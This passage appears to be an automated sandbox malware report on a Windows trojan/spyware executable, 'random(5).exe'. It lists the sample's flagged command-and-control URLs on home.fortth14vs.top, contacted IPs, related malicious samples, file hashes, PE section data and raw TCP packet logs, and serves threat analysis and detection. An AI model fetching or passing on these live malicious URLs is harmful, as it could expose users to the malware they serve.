              http://home.fortth14vs.top/gduZ0random(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258581917.000000000086C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963random(5).exe, 00000000.00000002.2257978659.00000000007BE000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://curl.se/docs/alt-svc.htmlrandom(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                http://.cssrandom(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpfalse
                  		high
                  https://curl.se/docs/hsts.htmlrandom(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpfalse
                    		high
                    https://curl.se/docs/alt-svc.html#random(5).exefalse
                      		high
                      https://httpbin.org/ipbeforerandom(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high
                        http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0Urandom(5).exe, 00000000.00000003.2251580735.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258142461.00000000007F5000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMahrandom(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://curl.se/docs/hsts.html#random(5).exefalse
                          		high
                          http://home.fortth14vs.top/gduZrandom(5).exe, random(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258581917.000000000086C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://home.fortth14vs.top/gduZTrandom(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258581917.000000000086C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://curl.se/docs/http-cookies.html#random(5).exefalse
                            		high
                            http://.jpgrandom(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpfalse
                              		high
                              http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lserandom(5).exe, 00000000.00000002.2257978659.00000000007BE000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              34.147.147.173
                              		home.fortth14vs.topUnited States
                              		2686ATGS-MMD-ASUSfalse
                              34.200.57.114
                              		httpbin.orgUnited States
                              		14618AMAZON-AESUSfalse

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1583231
                              Start date and time:2025-01-02 09:14:09 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 56s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:5
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:random(5).exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              34.147.147.173Set-up.exeGet hashmaliciousUnknownBrowse
                              • home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435
                              Set-up.exeGet hashmaliciousUnknownBrowse
                              • home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435
                              TX5LAYBZRI.exeGet hashmaliciousUnknownBrowse
                              • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                              XJiB3BdLTg.exeGet hashmaliciousUnknownBrowse
                              • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                              Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                              • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                              34.200.57.114Set-up.exeGet hashmaliciousUnknownBrowse
                                Set-up.exeGet hashmaliciousUnknownBrowse
                                  TX5LAYBZRI.exeGet hashmaliciousUnknownBrowse
                                    joE9s9sbv0.exeGet hashmaliciousUnknownBrowse
                                      Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                                        JbN2WYseAr.exeGet hashmaliciousUnknownBrowse
                                          r8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                                            ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              home.fortth14vs.topTX5LAYBZRI.exeGet hashmaliciousUnknownBrowse
                                              • 34.147.147.173
                                              XJiB3BdLTg.exeGet hashmaliciousUnknownBrowse
                                              • 34.147.147.173
                                              Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                                              • 34.147.147.173
                                              r8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                                              • 91.149.241.220
                                              yqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                                              • 91.149.241.220
                                              ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                                              • 91.149.241.220
                                              Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                                              • 91.149.241.220
                                              httpbin.orgSet-up.exeGet hashmaliciousUnknownBrowse
                                              • 34.200.57.114
                                              Set-up.exeGet hashmaliciousUnknownBrowse
                                              • 34.200.57.114
                                              TX5LAYBZRI.exeGet hashmaliciousUnknownBrowse
                                              • 34.200.57.114
                                              Prs9eAnu2k.exeGet hashmaliciousUnknownBrowse
                                              • 34.197.122.172
                                              joE9s9sbv0.exeGet hashmaliciousUnknownBrowse
                                              • 34.200.57.114
                                              XJiB3BdLTg.exeGet hashmaliciousUnknownBrowse
                                              • 34.197.122.172
                                              Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                                              • 34.200.57.114
                                              JbN2WYseAr.exeGet hashmaliciousUnknownBrowse
                                              • 34.200.57.114
                                              r8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                                              • 34.200.57.114
                                              yqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                                              • 34.197.122.172

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              AMAZON-AESUSarmv5l.elfGet hashmaliciousUnknownBrowse
                                              • 54.145.174.46
                                              armv4l.elfGet hashmaliciousUnknownBrowse
                                              • 3.239.217.249
                                              loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                              • 54.62.196.47
                                              https://mmm.askfollow.us/#CRDGet hashmaliciousUnknownBrowse
                                              • 52.86.216.144
                                              http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
                                              • 34.225.54.239
                                              https://t.co/YjyGioQuKTGet hashmaliciousUnknownBrowse
                                              • 54.84.23.94
                                              http://img1.wsimg.com/blobby/go/9b6ed793-452c-4f8f-8f80-6847f4d114d7/downloads/71318864754.pdfGet hashmaliciousUnknownBrowse
                                              • 52.204.28.27
                                              https://password-changes.phishwall.net/XMzUzaXgwTnBGZU9XbU9kQnFIZk0vQ3hhQlNtUXJwaExCOTNDYnhpMG92ZHRNQjI5SHhmNUlLTC9JcmVVS2sraDgvUVZtd2YwVFROeGxlbDR0UXBkeGJOUkN3UGliUUNGVHZXWVJ2ek5hZ0FNV290djROWFRxN3JNazM1WlhNOUVLdnlqOEVlbXFaaFROMlltRDFFKzhmU3A0eEl4cE1tMFJmazVYOE5hc25oTjNIR0Q1UzJyNW5wTkNBPT0tLUdCVnp5RnltanNuQnVQWkgtLVA0Uy9TcENHeDltOGdwd282cnZiaEE9PQ==?cid=2317630324Get hashmaliciousHTMLPhisher, KnowBe4Browse
                                              • 23.22.159.74
                                              Set-up.exeGet hashmaliciousUnknownBrowse
                                              • 34.200.57.114
                                              Set-up.exeGet hashmaliciousUnknownBrowse
                                              • 34.200.57.114
                                              ATGS-MMD-ASUSgZY58wycW0.exeGet hashmaliciousGhostRatBrowse
                                              • 34.1.142.70
                                              random.exeGet hashmaliciousCredential FlusherBrowse
                                              • 34.160.144.191
                                              armv5l.elfGet hashmaliciousUnknownBrowse
                                              • 33.8.247.170
                                              armv7l.elfGet hashmaliciousUnknownBrowse
                                              • 56.161.195.74
                                              armv4l.elfGet hashmaliciousUnknownBrowse
                                              • 48.248.220.219
                                              armv6l.elfGet hashmaliciousUnknownBrowse
                                              • 48.15.174.221
                                              loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                              • 57.26.56.105
                                              loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                              • 48.195.166.175
                                              loligang.mips.elfGet hashmaliciousMiraiBrowse
                                              • 34.167.142.96
                                              loligang.spc.elfGet hashmaliciousMiraiBrowse
                                              • 32.159.121.64

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              No created / dropped files found

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                              Entropy (8bit):7.987379795408887
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • VXD Driver (31/22) 0.00%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:random(5).exe
                                              File size:4'484'096 bytes
                                              MD5:f200a3445a8034d201eeb79bb29e1d73
                                              SHA1:473cd32eb4bc8ff05c3e608b86ba651fc4d7b0e1
                                              SHA256:ee6c112a14a1e5a9429b47f5b810f61a58e77860eea867e064d2ab40582757cc
                                              SHA512:6170ced6054e3df739312e54d89bf969c305b5eb34dff3e1645a11f2614463d41bf1d98a21e94d6b611654e4a0bfae1164c9cfb0e84d8149a15711976a81daa7
                                              SSDEEP:98304:tteL6ZJc0HazXMrBDxmWsmzM4bLvM17r1hLYe44:bZJB6zXMF9mqM4vvM175ZYe44
                                              TLSH:D926333FD8A3549BCD11053C646424504BFC1B717FABF08B73EA9A185B6BE30A89D9E1
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..M...w..2............M...@..........................0........E...@... ............................

                                              File Icon

                                              Icon Hash:00928e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x10a0000
                                              Entrypoint Section:.taggant
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                              DLL Characteristics:DYNAMIC_BASE
                                              Time Stamp:0x677235C4 [Mon Dec 30 05:55:16 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                                              Authenticode Signature

                                              Signature Valid:
                                              Signature Issuer:
                                              Signature Validation Error:
                                              Error Number:
                                              Not Before, Not After
                                                Subject Chain
                                                  Version:
                                                  Thumbprint MD5:
                                                  Thumbprint SHA-1:
                                                  Thumbprint SHA-256:
                                                  Serial:

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp 00007F519CF6F0EAh
                                                  cmovp eax, dword ptr [eax+eax+00h]
                                                  add byte ptr [eax], al
                                                  add cl, ch
                                                  add byte ptr [eax], ah
                                                  add byte ptr [eax], al
                                                  add byte ptr [esi], al
                                                  or al, byte ptr [eax]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], dh
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax+eax], bl
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  push es
                                                  or al, byte ptr [eax]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [esi], al
                                                  add byte ptr [eax], 00000000h
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  adc byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add al, 0Ah
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x74c05f0x73.idata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x74b0000x2b0.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x7782000x688
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xc9ec640x10whflkpvn
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0xc9ec140x18whflkpvn
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  0x10000x74a0000x289000bb5665c7ec03789c4cae8efab810e2fdunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x74b0000x2b00x200c23d0a8d303bd845ffc1175accd22166False0.80078125data5.9750009673578965IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .idata 0x74c0000x10000x20052564c2cea63394dbc4e71775ebabcc0False0.166015625data1.1589685166080708IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  0x74d0000x3980000x200d5a968f595dbf17d881e4646af765fe5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  whflkpvn0xae50000x1ba0000x1ba000ee64ce26496913dd203454edf9258e5fFalse0.994563728436086data7.955966555987466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  esywlygt0xc9f0000x10000x400effb0fcc375b15c296df7f70da236699False0.7646484375data6.013886737052914IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .taggant0xca00000x30000x22005005c7c357368296725d78bd623da61bFalse0.06640625DOS executable (COM)0.7367757296076987IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_MANIFEST0xc9ec740x256ASCII text, with CRLF line terminators0.5100334448160535

                                                  Imports

                                                  DLLImport
                                                  kernel32.dlllstrcpy

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 2, 2025 09:15:06.876965046 CET49710443192.168.2.634.200.57.114
                                                  Jan 2, 2025 09:15:06.877002001 CET4434971034.200.57.114192.168.2.6
                                                  Jan 2, 2025 09:15:06.877073050 CET49710443192.168.2.634.200.57.114
                                                  Jan 2, 2025 09:15:06.887284040 CET49710443192.168.2.634.200.57.114
                                                  Jan 2, 2025 09:15:06.887296915 CET4434971034.200.57.114192.168.2.6
                                                  Jan 2, 2025 09:15:07.553427935 CET4434971034.200.57.114192.168.2.6
                                                  Jan 2, 2025 09:15:07.561655045 CET49710443192.168.2.634.200.57.114
                                                  Jan 2, 2025 09:15:07.561674118 CET4434971034.200.57.114192.168.2.6
                                                  Jan 2, 2025 09:15:07.562725067 CET4434971034.200.57.114192.168.2.6
                                                  Jan 2, 2025 09:15:07.562793016 CET49710443192.168.2.634.200.57.114
                                                  Jan 2, 2025 09:15:07.564064980 CET49710443192.168.2.634.200.57.114
                                                  Jan 2, 2025 09:15:07.564176083 CET4434971034.200.57.114192.168.2.6
                                                  Jan 2, 2025 09:15:07.575813055 CET49710443192.168.2.634.200.57.114
                                                  Jan 2, 2025 09:15:07.575820923 CET4434971034.200.57.114192.168.2.6
                                                  Jan 2, 2025 09:15:07.623521090 CET49710443192.168.2.634.200.57.114
                                                  Jan 2, 2025 09:15:07.677716970 CET4434971034.200.57.114192.168.2.6
                                                  Jan 2, 2025 09:15:07.677829981 CET4434971034.200.57.114192.168.2.6
                                                  Jan 2, 2025 09:15:07.678071976 CET49710443192.168.2.634.200.57.114
                                                  Jan 2, 2025 09:15:07.685615063 CET49710443192.168.2.634.200.57.114
                                                  Jan 2, 2025 09:15:07.685628891 CET4434971034.200.57.114192.168.2.6
                                                  Jan 2, 2025 09:15:09.356427908 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.365911961 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.365993977 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.366978884 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.371841908 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.371855974 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.371891975 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.371901035 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.371912003 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.371915102 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.371953011 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.371969938 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.372028112 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.372035980 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.372044086 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.372047901 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.372107983 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.376492977 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.376554966 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.376705885 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.376713991 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.376745939 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.376754999 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.376769066 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.376796007 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.376801014 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.376805067 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.376863003 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.419063091 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.419253111 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.467052937 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.467178106 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.515033960 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.515099049 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.567019939 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.567112923 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.615035057 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.615151882 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.663044930 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.663114071 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.715050936 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.715174913 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.763072968 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.763145924 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.794883966 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.795135975 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.800060034 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800070047 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800086975 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800095081 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800112009 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800121069 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800179005 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800187111 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800226927 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800235987 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800246000 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800306082 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.800313950 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800322056 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800338030 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.800347090 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800355911 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800371885 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800391912 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.800440073 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800601959 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800610065 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800615072 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800678968 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800769091 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800776958 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800816059 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800887108 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800915956 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800925016 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800973892 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800992966 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.801044941 CET804971134.147.147.173192.168.2.6
